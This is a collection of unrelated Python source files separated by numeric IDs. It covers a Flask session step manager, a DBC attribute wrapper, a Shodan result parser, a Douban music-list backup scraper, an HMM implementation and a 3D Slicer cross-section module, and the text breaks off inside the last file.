156348
|
from app.services.steps import *
from flask import g, current_app
class SessionManager:
"""
Session manager is responsible for taking in a registrant and current step and then determining which step needs to be performed next.
"""
# initialize these as None, override them with init method if valid.
next_step = None
prev_step = None
def __init__(self, registrant, current_step):
self.registrant = registrant
self.current_step = current_step
self._init_next_step()
self._init_prev_step()
def _init_next_step(self):
"""
If the current step has a next step set, initialize the next step class and save it to self.
"""
if self.current_step.next_step:
next_step = globals()[self.current_step.next_step]
self.next_step = next_step()
def _init_prev_step(self):
"""
If the current step has a previous step set, initialize the previous step class and save it to self.
"""
if self.current_step.prev_step:
prev_step = globals()[self.current_step.prev_step]
self.prev_step = prev_step()
    def vr_completed(self):
        return bool(self.registrant.vr_completed_at and self.registrant.try_value('vr_form', False))
    def ab_completed(self):
        return bool(self.registrant.ab_completed_at and self.registrant.try_value('ab_forms', False))
def get_locale_url(self, endpoint):
lang_code = g.get('lang_code', None)
if lang_code:
return '/' + lang_code + endpoint
else:
return endpoint
def get_redirect_url(self):
"""
Should always return a url path. Look at the current step and determine if the user needs to:
A: Move on to next step.
B: Move back to previous step.
C: Stay at current step.
"""
# For Step 0 when no previous step exists
if not self.prev_step:
if self.current_step.is_complete:
return self.get_locale_url(self.next_step.endpoint)
else:
return self.get_locale_url(self.current_step.endpoint)
# For the previous step iterate all of the requirements.
# If the requirement is not fulfilled return the previous step url
for req in self.prev_step.all_requirements():
# if a requirement is missing return the endpoint for the previous step
if not self.registrant.has_value_for_req(req):
return self.get_locale_url(self.prev_step.endpoint)
# if the step has been completed move on
if self.current_step.is_complete:
return self.get_locale_url(self.next_step.endpoint)
#default to returning current step
return self.get_locale_url(self.current_step.endpoint)
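# Hypothetical usage sketch (inside a Flask request handler; the registrant and
# step objects stand in for whatever models the app provides):
#
#   manager = SessionManager(registrant, current_step)
#   return redirect(manager.get_redirect_url())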
|
156361
|
import os
from typing import Any, Dict
name: str
env: Dict[Any, Any] = dict(os.environ)
def set_name(new_name: str) -> None:
global name
name = new_name
def set_env(env_to_set: dict) -> None:
    # dict.update mutates env in place, so no `global` declaration is needed
    env.update(env_to_set)
def unset_env(env_to_unset: dict) -> None:
    for k in env_to_unset:
        env.pop(k, None)
def prepend_path(new_path: str) -> None:
    # Fall back gracefully if PATH is somehow absent from the snapshot
    old_path = env.get('PATH', '')
    env['PATH'] = f'{new_path}:{old_path}' if old_path else new_path
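# Hypothetical usage sketch (values are illustrative):
#
#   set_name('builder')
#   set_env({'CC': 'clang'})
#   prepend_path('/opt/toolchain/bin')
#   unset_env({'TMPDIR': None})   # only the keys are used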
|
156411
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import six
import typing # NOQA: F401
from nixnet import _funcs
from nixnet import constants
class DbcAttributeCollection(collections.Mapping):
"""Collection for accessing DBC attributes."""
def __init__(self, handle):
# type: (int) -> None
self._handle = handle
# Here, we are caching the attribute names and enums to work around a driver issue.
# The issue results in an empty attribute value after intermixing calls to get attribute values and enums.
# We can avoid this issue if we get all attribute enums first, before getting any attribute values.
self._cache = dict(
(name, self._get_enums(name))
for name in self._get_names()
)
def __repr__(self):
return '{}(handle={})'.format(type(self).__name__, self._handle)
def __eq__(self, other):
if isinstance(other, self.__class__):
return self._handle == typing.cast(DbcAttributeCollection, other)._handle
else:
return NotImplemented
def __ne__(self, other):
result = self.__eq__(other)
if result is NotImplemented:
return result
else:
return not result
def __hash__(self):
return hash(self._handle)
    def __len__(self):
        return len(self._cache)
    def __iter__(self):
        return iter(self._cache)
def __getitem__(self, key):
# type: (typing.Text) -> typing.Tuple[typing.Text, bool]
"""Return the attribute value and whether it's the default value.
Args:
key(str): attribute name.
Returns:
tuple(str, bool): attribute value and whether it's the default value.
"""
if isinstance(key, six.string_types):
return self._get_value(key)
else:
raise TypeError(key)
def keys(self):
"""Return all attribute names in the collection.
Yields:
An iterator to all attribute names in the collection.
"""
for name in self._cache:
yield name
def values(self):
"""Return all attribute values in the collection.
Yields:
An iterator to all attribute values in the collection.
"""
for name in self._cache:
yield self._get_value(name)
def items(self):
"""Return all attribute names and values in the collection.
Yields:
An iterator to tuple pairs of attribute names and values in the collection.
"""
for name in self._cache:
yield name, self._get_value(name)
def _get_names(self):
# type: () -> typing.List[typing.Text]
mode = constants.GetDbcAttributeMode.ATTRIBUTE_LIST
attribute_size = _funcs.nxdb_get_dbc_attribute_size(self._handle, mode, '')
attribute_info = _funcs.nxdb_get_dbc_attribute(self._handle, mode, '', attribute_size)
name_string = attribute_info[0]
name_list = [
name
for name in name_string.split(',')
if name.strip()
]
return name_list
def _get_enums(self, name):
# type: (typing.Text) -> typing.List[typing.Text]
mode = constants.GetDbcAttributeMode.ENUMERATION_LIST
attribute_size = _funcs.nxdb_get_dbc_attribute_size(self._handle, mode, name)
attribute_info = _funcs.nxdb_get_dbc_attribute(self._handle, mode, name, attribute_size)
enum_string = attribute_info[0]
enum_list = [
enum
for enum in enum_string.split(',')
if enum.strip()
]
return enum_list
def _get_value(self, name):
# type: (typing.Text) -> typing.Tuple[typing.Text, bool]
if name not in self._cache:
raise KeyError('Attribute name %s not found in DBC attributes' % name)
mode = constants.GetDbcAttributeMode.ATTRIBUTE
attribute_size = _funcs.nxdb_get_dbc_attribute_size(self._handle, mode, name)
attribute_info = _funcs.nxdb_get_dbc_attribute(self._handle, mode, name, attribute_size)
enums = self._cache[name]
if not enums:
return attribute_info
# This attribute is an enum. Replace the enum index with the enum string.
index = int(attribute_info[0])
attribute_info = (enums[index], attribute_info[1])
return attribute_info
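# Hypothetical usage sketch (assumes `db_handle` is a valid database handle
# obtained from the surrounding nixnet database API):
#
#   attrs = DbcAttributeCollection(db_handle)
#   for name, (value, is_default) in attrs.items():
#       print(name, value, '(default)' if is_default else '')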
|
156413
|
from queue import Queue
class Gate:
def __init__(self, id_num, gate_type, input_ids, gate_queue=None, ready=False, const_input=None):
self.id_num = id_num
self.gate_type = gate_type
self.input_ids = input_ids
self.inputs = {}
for in_id in input_ids:
self.inputs[in_id] = ""
if self.gate_type == "INPUT":
self.inputs = {}
self.inputs[""] = ""
        self.gate_queue = gate_queue
self.ready = ready
self.complete = False
self.output = ""
self.const_input = const_input
def reset(self):
for in_id in self.inputs:
self.inputs[in_id] = ""
if self.gate_type == "INPUT":
self.inputs[""] = ""
self.ready = False
    def add_input(self, in_id, in_value):
        self.inputs[in_id] = in_value
def get_inputs(self):
input_vals = []
for key in self.inputs:
if key != self.const_input:
input_vals.append(self.inputs[key])
return input_vals
def get_input_ids(self):
return self.input_ids
def get_type(self):
return self.gate_type
def get_id(self):
return self.id_num
def get_const_inputs(self):
input_vals = []
for key in self.inputs:
if key == self.const_input:
input_vals.append(self.inputs[key])
return input_vals
def is_ready(self):
ready = True
for in_id in self.inputs:
if self.inputs[in_id] == "":
ready = False
self.ready = ready
return self.ready
def is_complete(self):
return self.complete
def set_queue(self,q):
self.gate_queue = q
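# Hypothetical usage sketch (gate types and wiring are illustrative):
#
#   g = Gate("and0", "AND", ["in0", "in1"])
#   g.add_input("in0", 1)
#   g.add_input("in1", 0)
#   if g.is_ready():
#       print(g.get_inputs())   # [1, 0]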
|
156439
|
import re
class HostDetailsWrapper:
"""Klasa pomocnicza - wrapper parsujacy dane z serwisu https://www.shodan.io/."""
def __init__(self, ip, host_details):
self.__ip = ip
self.__data = host_details
@property
def ip(self):
"""Atrybut zwracajacy adres ip hosta."""
return self.__ip
@property
def data(self):
return self.__data.get("data", [])
@property
def ports(self):
"""Atrybut klaasy zwracajacy informacje o portach."""
return self.__data.get("ports", [])
@property
def http(self):
"""Atrybut zwracajacy infromacje o portach gdize wykosztyswany jest protokół http"""
results = []
for i in self.data:
port = i.get("port", None)
http = i.get("http", {})
results.append({"port": port, "http": http})
return results
@property
def html(self):
"""Atrybut zwracający dane html."""
results = []
for i in self.http:
port = i.get("port", None)
html_data = i.get("http", {})
if port and html_data:
results.append({"port": port, "html": html_data})
return results
@property
def redirects(self):
"""Atrybut zwracajacy informacje o przekierowaniach do innych hostów"""
results = []
for i in self.html:
port = i.get("port", None)
html_data = i.get("html", None)
if html_data and port:
                redirects = html_data.get("redirects", [])  # list of redirect records
if port and redirects:
for r in redirects:
redirect_data = r.get("data", "")
pattern = r'https:\/\/\d+\.\d+\.\d+\.\d+\/*\w+\/*' # TODO:
addresses = re.findall(pattern, redirect_data)
results.append({"port": port, "redirects": addresses})
return results
@property
def to_json(self):
response = {}
response.update({"ip": self.ip})
response.update({"ports": self.ports})
response.update({"html": self.html})
response.update({"redirects": self.redirects})
return response
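# Hypothetical usage sketch (the host_details dict mirrors the shape of a
# Shodan host lookup response; values are illustrative):
#
#   details = {"ports": [80], "data": [{"port": 80, "http": {"redirects": []}}]}
#   host = HostDetailsWrapper("192.0.2.1", details)
#   print(host.to_json)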
|
156504
|
from bs4 import BeautifulSoup
import re
import time
import requests
headers0 = {'User-Agent':"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36"}
def Musappend(Mdict,Items):
for it in Items:
title=it('a')[0].get_text(strip=True)
date=it(class_=re.compile('date'))[0].get_text(strip=True)
        try:
            stars = it(class_=re.compile('rat'))[0]['class'][0][6]
        except (IndexError, KeyError):
            stars = 'Nah'
        try:
            comment = it(class_=re.compile('comm'))[0].get_text(strip=True).replace('\n', '-')
        except IndexError:
            comment = 'Nah'
        try:
            intro = it(class_='intro')[0].get_text(strip=True)
        except IndexError:
            intro = 'Nah'
Mdict[title]=[intro,date,stars,comment]
def HeardList(doubanid):
firstpage='https://music.douban.com/people/'+doubanid+'/collect?sort=time&start=0&filter=all&mode=list&tags_sort=count'
sess = requests.Session()
sess.headers.update(headers0)
request=sess.get(firstpage)
soup=BeautifulSoup(request.text,'html.parser')
items=soup.find_all(class_=re.compile('item'),id=re.compile('li'))
heard_dic={}
Musappend(Mdict=heard_dic,Items=items)
page=1
    print(f'Page {page}', request.reason)
while 1:
time.sleep(1)
        try:
            NextPage = soup.find(class_='next').link.get('href')
        except AttributeError:
            print('Reached the last page')
            break
else:
request=sess.get(NextPage)
soup=BeautifulSoup(request.text,'html.parser')
items=soup.find_all(class_=re.compile('item'),id=re.compile('li'))
Musappend(Mdict=heard_dic,Items=items)
page+=1
            print(f'Page {page}', request.reason)
    with open(doubanid + '_Heard_List.csv', 'w', encoding='utf-8_sig') as fw:
        fw.write('Album/Single,Intro,Date,Rating,Comment\n')
        for title in heard_dic.keys():
            fw.write(title.replace(',', '、').replace(',', '、') + ',' +
                     heard_dic[title][0].replace(',', '、').replace(',', '、') + ',' +
                     heard_dic[title][1] + ',' + heard_dic[title][2] + ',' +
                     heard_dic[title][3].replace(',', '、').replace(',', '、') + '\n')
def WMusappend(Mdict,Items):
for it in Items:
title=it('a')[0].get_text(strip=True)
date=it(class_=re.compile('date'))[0].get_text(strip=True)
        try:
            comment = it(class_=re.compile('comm'))[0].get_text(strip=True).replace('\n', '-')
        except IndexError:
            comment = 'Nah'
        try:
            intro = it(class_='intro')[0].get_text(strip=True)
        except IndexError:
            intro = 'Nah'
Mdict[title]=[intro,date,comment]
def WHeardList(doubanid):
firstpage='https://music.douban.com/people/'+doubanid+'/wish?sort=time&start=0&filter=all&mode=list&tags_sort=count'
sess = requests.Session()
sess.headers.update(headers0)
request=sess.get(firstpage)
soup=BeautifulSoup(request.text,'html.parser')
items=soup.find_all(class_=re.compile('item'),id=re.compile('li'))
whear_dic={}
WMusappend(Mdict=whear_dic,Items=items)
page=1
    print(f'Page {page}', request.reason)
while 1:
time.sleep(1)
        try:
            NextPage = soup.find(class_='next').link.get('href')
        except AttributeError:
            print('Reached the last page')
            break
        else:
            request = sess.get(NextPage)
            soup = BeautifulSoup(request.text, 'html.parser')
            items = soup.find_all(class_=re.compile('item'), id=re.compile('li'))
            # This is the wish list, so use WMusappend; the original called
            # Musappend, whose 4-element rows would corrupt the 3-column CSV below.
            WMusappend(Mdict=whear_dic, Items=items)
            page += 1
            print(f'Page {page}', request.reason)
    with open(doubanid + '_MusicWish_List.csv', 'w', encoding='utf-8_sig') as fw:
        fw.write('Album/Single,Intro,Date,Note\n')
        for title in whear_dic.keys():
            fw.write(title.replace(',', '、').replace(',', '、') + ',' +
                     whear_dic[title][0].replace(',', '、').replace(',', '、') + ',' +
                     whear_dic[title][1] + ',' +
                     whear_dic[title][2].replace(',', '、').replace(',', '、') + '\n')
def main():
    print("This program backs up a user's Douban music records")
    choice = input('Confirm that you want to back up (yes/no): ')
    if choice == 'yes':
        douban_id = input('Enter your Douban ID: ')
        print("Backing up the 'listened' list")
        HeardList(doubanid=douban_id)
        time.sleep(2)
        print("Backing up the 'want to listen' list")
        WHeardList(doubanid=douban_id)
        print('The backup is saved in the directory of this exe (if nothing went wrong)')
        print('Feedback: <EMAIL> | https://github.com/JimSunJing/douban_clawer')
        input('Press any key to exit')
    else:
        print('bye')
main()
|
156506
|
from ._legendre import Legendre, Legendre_Normalized
from ._laguerre import Laguerre
from ._hermite import Hermite, Hermite2
from ._chebyshev import Chebyshev, Chebyshev2
from ._jacobi import Jacobi
__all__ = ['Legendre', 'Legendre_Normalized', 'Laguerre', 'Hermite', 'Hermite2', 'Chebyshev', 'Chebyshev2', 'Jacobi']
|
156510
|
import platform
if platform.system() == 'Darwin':
from mac_graph_traversal import *
else:
from graph_traversal import *
|
156671
|
import src.Exceptions as Exceptions
from src.Parser import Parser
from src.Interpreteur import Interpreteur
import time
import sys
import json
with open("settings.json", "r") as settings_file:
    settings = json.load(settings_file)
ERROR_MESSAGE = settings["main"]["ERROR_MESSAGE"]
args = sys.argv
if len(sys.argv) < 2:
    raise Exceptions.NotEnoughArguments(ERROR_MESSAGE)
debug = ("-d" in sys.argv, "-dp" in sys.argv or "-d" in sys.argv, "-di" in sys.argv or "-d" in sys.argv, "-o" in sys.argv)
arguments = False
liste_argv = []
for arg in sys.argv:
if arg == "-a":
arguments = True
elif arg == "-A":
arguments = False
elif arguments:
liste_argv.append(arg)
if "-p" in sys.argv:
temps = time.time()
print("Début de la compilation")
parser = Parser(debug[1], debug[3])
parser.getstr(sys.argv[1])
parser.generateinstructions()
if not debug : print(parser.instructions)
print(f"Compilation terminée en {time.time()-temps}s")
else:
temps = time.time()
print("Début de la compilation")
parser = Parser(debug[1], debug[3])
parser.getstr(sys.argv[1])
parser.generateinstructions()
print(f"Compilation terminée en {time.time()-temps}s")
print("Début de l'interpretation")
temps = time.time()
interpreteur = Interpreteur(debug[2], debug[3], liste_argv)
interpreteur.run(parser.instructions)
print(f"Interpretation terminée en {time.time()-temps}s")
|
156688
|
import argparse
import os
import sys
import torch
from torch import nn
import torchtext
from torchtext import data
from torchtext import datasets
from eval_args import get_arg_parser
from performance import size_metrics
import utils
import constants  # referenced below for WMT14_EN_FR_SMALL_TRAIN; assumed to live alongside utils
from models.components.binarization import (
Binarize,
)
def main() -> None:
parser = get_arg_parser()
args = parser.parse_args()
device = "cuda" if torch.cuda.is_available() and args.cuda else "cpu"
print('using device {}'.format(device))
print('loading datasets...')
src = data.Field(include_lengths=True,
init_token='<sos>', eos_token='<eos>', batch_first=True, fix_length=200)
trg = data.Field(include_lengths=True,
init_token='<sos>', eos_token='<eos>', batch_first=True)
if args.dataset == 'WMT':
mt_train = datasets.TranslationDataset(
path=constants.WMT14_EN_FR_SMALL_TRAIN,
exts=('.en', '.fr'),
fields=(src, trg)
)
src_vocab, trg_vocab = utils.load_torchtext_wmt_small_vocab()
src.vocab = src_vocab
trg.vocab = trg_vocab
        mt_valid = None
        mt_test = None  # the WMT path provides no test split here; avoids a NameError below
else:
if args.dataset == 'Multi30k':
mt_train, mt_valid, mt_test = datasets.Multi30k.splits(
exts=('.en', '.de'),
fields=(src, trg),
)
elif args.dataset == 'IWSLT':
mt_train, mt_valid, mt_test = datasets.IWSLT.splits(
exts=('.en', '.de'),
fields=(src, trg),
)
else:
raise Exception("Uknown dataset: {}".format(args.dataset))
print('loading vocabulary...')
# mt_dev shares the fields, so it shares their vocab objects
src.build_vocab(
mt_train,
min_freq=args.torchtext_unk,
max_size=args.torchtext_src_max_vocab,
)
trg.build_vocab(
mt_train,
max_size=args.torchtext_trg_max_vocab,
)
print('loaded vocabulary')
# determine the correct dataset to evaluate
eval_dataset = mt_train if args.eval_train else mt_valid
eval_dataset = mt_test if args.eval_test else eval_dataset
train_loader = data.BucketIterator(
dataset=eval_dataset,
batch_size=1,
sort_key=lambda x: len(x.src), # data.interleave_keys(len(x.src), len(x.trg)),
sort_within_batch=True,
device=device
)
print('model type: {}'.format(args.model_type))
model = utils.build_model(parser, src.vocab, trg.vocab)
if args.load_path is not None:
model.load_state_dict(torch.load(args.load_path))
model = model.eval()
if args.binarize:
print('binarizing model')
binarized_model = Binarize(model)
binarized_model.binarization()
print(model)
model_size = size_metrics.get_model_size(model)
print("64 bit float: {}".format(size_metrics.get_model_size(model, 64, args.binarize)))
print("32 bit float: {}".format(size_metrics.get_model_size(model, 32, args.binarize)))
print("16 bit float: {}".format(size_metrics.get_model_size(model, 16, args.binarize)))
if __name__ == "__main__":
main()
|
156709
|
import json
from pathlib import Path
import typer
def get_skill_config(name=None):
app_dir = Path(typer.get_app_dir('skills-cli', force_posix=True))
config_file = app_dir / 'config.json'
    if not config_file.exists():
        # Also covers a fresh install where only the directory is missing; the
        # original checked the directory alone and crashed reading a missing file.
        typer.echo('Creating default configuration')
        app_dir.mkdir(parents=True, exist_ok=True)
        config = {}
    else:
        config = json.loads(config_file.read_text('utf-8')) or {}
remotes = config.get('remotes', {})
if not name:
return remotes
remote_config = remotes.get(name)
if not remote_config:
        typer.secho(f'No configured remote with the name {name} found', fg=typer.colors.RED, err=True)
raise typer.Exit(1)
return remote_config
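# Hypothetical usage sketch (the remote name is illustrative):
#
#   remotes = get_skill_config()          # dict of all configured remotes
#   origin = get_skill_config('origin')   # one remote; exits with code 1 if absent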
|
156723
|
import unittest
from accelergy import helper_functions as hf
class TestHelperFunctions(unittest.TestCase):
def test_oneD_linear_interpolation(self):
""" linear interpolation on one hardware attribute """
# Rough estimation of simple ripple carry adder: E_adder = E_full_adder * bitwidth + E_misc
E_full_adder = 4
E_misc = 2
bitwidth_0 = 32
bitwidth_1 = 8
energy_0 = E_full_adder * bitwidth_0 + E_misc
energy_1 = E_full_adder * bitwidth_1 + E_misc
bitwidth_desired = 16
# expected output
energy_desired = E_full_adder * bitwidth_desired + E_misc
energy_interpolated = hf.oneD_linear_interpolation(bitwidth_desired,[{'x':bitwidth_0, 'y': energy_0},
{'x':bitwidth_1, 'y':energy_1}])
self.assertEqual(energy_interpolated, energy_desired)
def test_oneD_quad_interpolation(self):
""" quadratic interpolation on one hardware attribute """
# Rough estimation of simple array multiplier: E_mult = E_full_adder * bitwidth^2 + E_misc
E_full_adder = 4
E_misc = 2
bitwidth_0 = 32
bitwidth_1 = 8
energy_0 = E_full_adder * bitwidth_0**2 + E_misc
energy_1 = E_full_adder * bitwidth_1**2 + E_misc
bitwidth_desired = 16
# expected output
energy_desired = E_full_adder * bitwidth_desired**2 + E_misc
energy_interpolated = hf.oneD_quadratic_interpolation(bitwidth_desired,[{'x':bitwidth_0, 'y': energy_0},
{'x':bitwidth_1, 'y':energy_1}])
self.assertEqual(energy_interpolated, energy_desired)
if __name__ == '__main__':
unittest.main()
|
156734
|
# Split N sorted digits alternately between two numbers; dealing the digits out
# smallest-first keeps both numbers small, which minimizes their sum.
n = int(input("Enter N: "))
l = []
for i in range(0, n):
    inp = int(input("Enter numbers: "))
    l.append(inp)
l.sort()
a = 0
b = 0
# Even indices go to b, odd indices to a, each number built most-significant digit first
for i in range(0, n):
    if i % 2 != 0:
        a = a * 10 + l[i]
    else:
        b = b * 10 + l[i]
c = a + b
print(c)
|
156750
|
import numpy as np
class HMM:
def __init__(self, A=None, B=None, pi=None):
self.A = A
self.B = B
self.pi = pi
def forward(self, O, detailed=False):
alpha = self.pi*self.B[:, O[0]]
if detailed:
print("alpha: {}".format(alpha))
for t in range(1, len(O)):
alpha = np.squeeze(np.matmul(self.A.T, alpha[..., None]))*self.B[:, O[t]]
return np.sum(alpha)
def backward(self, O):
beta = np.ones(self.pi.shape)
for t in range(len(O)-1, 0, -1):
beta = np.squeeze(np.matmul(self.A, (self.B[:, O[t]]*beta)[..., None]))
return np.sum(self.pi*self.B[:, O[0]]*beta)
    def Viterbi(self, O):
        # initialization
        delta = self.pi*self.B[:, O[0]]
        psi = np.zeros((len(O), len(delta)), dtype=int)  # psi[t, j]: best predecessor of state j at time t
        for t in range(1, len(O)):
            trans = delta[:, None]*self.A             # trans[i, j] = delta[i] * A[i, j]
            psi[t, :] = np.argmax(trans, axis=0)      # maximize over the previous state i
            delta = np.max(trans, axis=0)*self.B[:, O[t]]
        I = []
        i = np.argmax(delta)
        I.append(i)
        for t in range(len(O)-1, 0, -1):
            i = psi[t, int(i)]
            I.append(i)
        I = [int(i) for i in I]
        return np.max(delta), I[::-1]
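# Hypothetical usage sketch (a two-state toy model; the numbers are illustrative):
#
#   A = np.array([[0.7, 0.3], [0.4, 0.6]])   # state transition matrix
#   B = np.array([[0.5, 0.5], [0.1, 0.9]])   # emission matrix
#   pi = np.array([0.6, 0.4])                # initial state distribution
#   hmm = HMM(A, B, pi)
#   O = [0, 1, 1]                            # observation indices
#   hmm.forward(O)    # P(O) via the forward pass
#   hmm.backward(O)   # the same likelihood via the backward pass
#   hmm.Viterbi(O)    # (probability of best path, most likely state sequence)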
|
156757
|
import os
import unittest
import logging
import vtk, qt, ctk, slicer
from slicer.ScriptedLoadableModule import *
from slicer.util import VTKObservationMixin
#
# SegmentCrossSectionArea
#
class SegmentCrossSectionArea(ScriptedLoadableModule):
"""Uses ScriptedLoadableModule base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def __init__(self, parent):
ScriptedLoadableModule.__init__(self, parent)
self.parent.title = "Segment Cross-Section Area"
self.parent.categories = ["Quantification"]
self.parent.dependencies = []
self.parent.contributors = ["<NAME> (AMNH)", "<NAME> (PerkLab)"]
self.parent.helpText = """This module computes cross-section of segments (created by Segment Editor module) and displays them in a plot.
Write to <a href="https://discourse.slicer.org">Slicer forum</a> if you need help using this module
"""
self.parent.acknowledgementText = """
This file was originally developed by <NAME> and <NAME>.
"""
#
# SegmentCrossSectionAreaWidget
#
class SegmentCrossSectionAreaWidget(ScriptedLoadableModuleWidget, VTKObservationMixin):
"""Uses ScriptedLoadableModuleWidget base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def __init__(self, parent=None):
"""
Called when the user opens the module the first time and the widget is initialized.
"""
ScriptedLoadableModuleWidget.__init__(self, parent)
VTKObservationMixin.__init__(self) # needed for parameter node observation
self.logic = None
self._parameterNode = None
def setup(self):
"""
Called when the user opens the module the first time and the widget is initialized.
"""
ScriptedLoadableModuleWidget.setup(self)
# Load widget from .ui file (created by Qt Designer)
uiWidget = slicer.util.loadUI(self.resourcePath('UI/SegmentCrossSectionArea.ui'))
self.layout.addWidget(uiWidget)
self.ui = slicer.util.childWidgetVariables(uiWidget)
        # Set scene in MRML widgets. Make sure that in Qt designer the
        # "mrmlSceneChanged(vtkMRMLScene*)" signal is connected to each MRML
        # widget's "setMRMLScene(vtkMRMLScene*)" slot.
uiWidget.setMRMLScene(slicer.mrmlScene)
# Create a new parameterNode
# This parameterNode stores all user choices in parameter values, node selections, etc.
# so that when the scene is saved and reloaded, these settings are restored.
self.logic = SegmentCrossSectionAreaLogic()
self.ui.parameterNodeSelector.addAttribute("vtkMRMLScriptedModuleNode", "ModuleName", self.moduleName)
self.setParameterNode(self.logic.getParameterNode())
# Connections
self.ui.parameterNodeSelector.connect('currentNodeChanged(vtkMRMLNode*)', self.setParameterNode)
self.ui.applyButton.connect('clicked(bool)', self.onApplyButton)
self.ui.showTablePushButton.connect('clicked(bool)', self.onShowTableButton)
self.ui.showChartPushButton.connect('clicked(bool)', self.onShowChartButton)
# These connections ensure that whenever user changes some settings on the GUI, that is saved in the MRML scene
# (in the selected parameter node).
self.ui.segmentationSelector.connect("currentNodeChanged(vtkMRMLNode*)", self.updateParameterNodeFromGUI)
self.ui.volumeSelector.connect("currentNodeChanged(vtkMRMLNode*)", self.updateParameterNodeFromGUI)
self.ui.axisSelectorBox.connect("currentIndexChanged(int)", self.updateParameterNodeFromGUI)
self.ui.tableSelector.connect("currentNodeChanged(vtkMRMLNode*)", self.updateParameterNodeFromGUI)
self.ui.chartSelector.connect("currentNodeChanged(vtkMRMLNode*)", self.updateParameterNodeFromGUI)
# Initial GUI update
self.updateGUIFromParameterNode()
def cleanup(self):
"""
Called when the application closes and the module widget is destroyed.
"""
self.removeObservers()
def setParameterNode(self, inputParameterNode):
"""
Adds observers to the selected parameter node. Observation is needed because when the
parameter node is changed then the GUI must be updated immediately.
"""
if inputParameterNode:
self.logic.setDefaultParameters(inputParameterNode)
# TODO: uncomment this when nodeFromIndex method will be available in Python
# # Select first segmentation node by default
# if not inputParameterNode.GetNodeReference("Segmentation"):
# segmentationNode = self.ui.segmentationSelector.nodeFromIndex(0)
# if segmentationNode:
# inputParameterNode.SetNodeReferenceID(segmentationNode.GetID())
# Set parameter node in the parameter node selector widget
wasBlocked = self.ui.parameterNodeSelector.blockSignals(True)
self.ui.parameterNodeSelector.setCurrentNode(inputParameterNode)
self.ui.parameterNodeSelector.blockSignals(wasBlocked)
if inputParameterNode == self._parameterNode:
# No change
return
# Unobserve previously selected parameter node and add an observer to the newly selected.
# Changes of parameter node are observed so that whenever parameters are changed by a script or any other module
# those are reflected immediately in the GUI.
if self._parameterNode is not None:
self.removeObserver(self._parameterNode, vtk.vtkCommand.ModifiedEvent, self.updateGUIFromParameterNode)
if inputParameterNode is not None:
self.addObserver(inputParameterNode, vtk.vtkCommand.ModifiedEvent, self.updateGUIFromParameterNode)
self._parameterNode = inputParameterNode
# Initial GUI update
self.updateGUIFromParameterNode()
def updateGUIFromParameterNode(self, caller=None, event=None):
"""
This method is called whenever parameter node is changed.
The module GUI is updated to show the current state of the parameter node.
"""
# Disable all sections if no parameter node is selected
self.ui.basicCollapsibleButton.enabled = self._parameterNode is not None
if self._parameterNode is None:
return
# Update each widget from parameter node
# Need to temporarily block signals to prevent infinite recursion (MRML node update triggers
# GUI update, which triggers MRML node update, which triggers GUI update, ...)
wasBlocked = self.ui.segmentationSelector.blockSignals(True)
self.ui.segmentationSelector.setCurrentNode(self._parameterNode.GetNodeReference("Segmentation"))
self.ui.segmentationSelector.blockSignals(wasBlocked)
wasBlocked = self.ui.volumeSelector.blockSignals(True)
self.ui.volumeSelector.setCurrentNode(self._parameterNode.GetNodeReference("Volume"))
self.ui.volumeSelector.blockSignals(wasBlocked)
wasBlocked = self.ui.axisSelectorBox.blockSignals(True)
self.ui.axisSelectorBox.currentText = self._parameterNode.GetParameter("Axis")
self.ui.axisSelectorBox.blockSignals(wasBlocked)
wasBlocked = self.ui.tableSelector.blockSignals(True)
self.ui.tableSelector.setCurrentNode(self._parameterNode.GetNodeReference("ResultsTable"))
self.ui.tableSelector.blockSignals(wasBlocked)
        wasBlocked = self.ui.chartSelector.blockSignals(True)
        self.ui.chartSelector.setCurrentNode(self._parameterNode.GetNodeReference("ResultsChart"))
        self.ui.chartSelector.blockSignals(wasBlocked)
# Update buttons states and tooltips
if self._parameterNode.GetNodeReference("Segmentation"):
self.ui.applyButton.toolTip = "Compute cross sections"
self.ui.applyButton.enabled = True
else:
self.ui.applyButton.toolTip = "Select input segmentation node"
self.ui.applyButton.enabled = False
def updateParameterNodeFromGUI(self, caller=None, event=None):
"""
This method is called when the user makes any change in the GUI.
The changes are saved into the parameter node (so that they are restored when the scene is saved and loaded).
"""
if self._parameterNode is None:
return
self._parameterNode.SetNodeReferenceID("Segmentation", self.ui.segmentationSelector.currentNodeID)
self._parameterNode.SetNodeReferenceID("Volume", self.ui.volumeSelector.currentNodeID)
self._parameterNode.SetParameter("Axis", self.ui.axisSelectorBox.currentText)
self._parameterNode.SetNodeReferenceID("ResultsTable", self.ui.tableSelector.currentNodeID)
self._parameterNode.SetNodeReferenceID("ResultsChart", self.ui.chartSelector.currentNodeID)
def onApplyButton(self):
"""
Run processing when user clicks "Apply" button.
"""
try:
# Create nodes for results
tableNode = self.ui.tableSelector.currentNode()
if not tableNode:
tableNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLTableNode", "Segment cross-section area table")
self.ui.tableSelector.setCurrentNode(tableNode)
plotChartNode = self.ui.chartSelector.currentNode()
if not plotChartNode:
plotChartNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLPlotChartNode", "Segment cross-section area plot")
self.ui.chartSelector.setCurrentNode(plotChartNode)
self.logic.run(self.ui.segmentationSelector.currentNode(), self.ui.volumeSelector.currentNode(), self.ui.axisSelectorBox.currentText,
tableNode, plotChartNode)
self.logic.showChart(plotChartNode)
except Exception as e:
slicer.util.errorDisplay("Failed to compute results: "+str(e))
import traceback
traceback.print_exc()
def onShowTableButton(self):
tableNode = self.ui.tableSelector.currentNode()
if not tableNode:
self.onApplyButton()
tableNode = self.ui.tableSelector.currentNode()
if tableNode:
self.logic.showTable(tableNode)
def onShowChartButton(self):
plotChartNode = self.ui.chartSelector.currentNode()
if not plotChartNode:
self.onApplyButton()
plotChartNode = self.ui.chartSelector.currentNode()
if plotChartNode:
self.logic.showChart(plotChartNode)
#
# SegmentCrossSectionAreaLogic
#
class SegmentCrossSectionAreaLogic(ScriptedLoadableModuleLogic):
"""This class should implement all the actual
computation done by your module. The interface
should be such that other python code can import
this class and make use of the functionality without
requiring an instance of the Widget.
Uses ScriptedLoadableModuleLogic base class, available at:
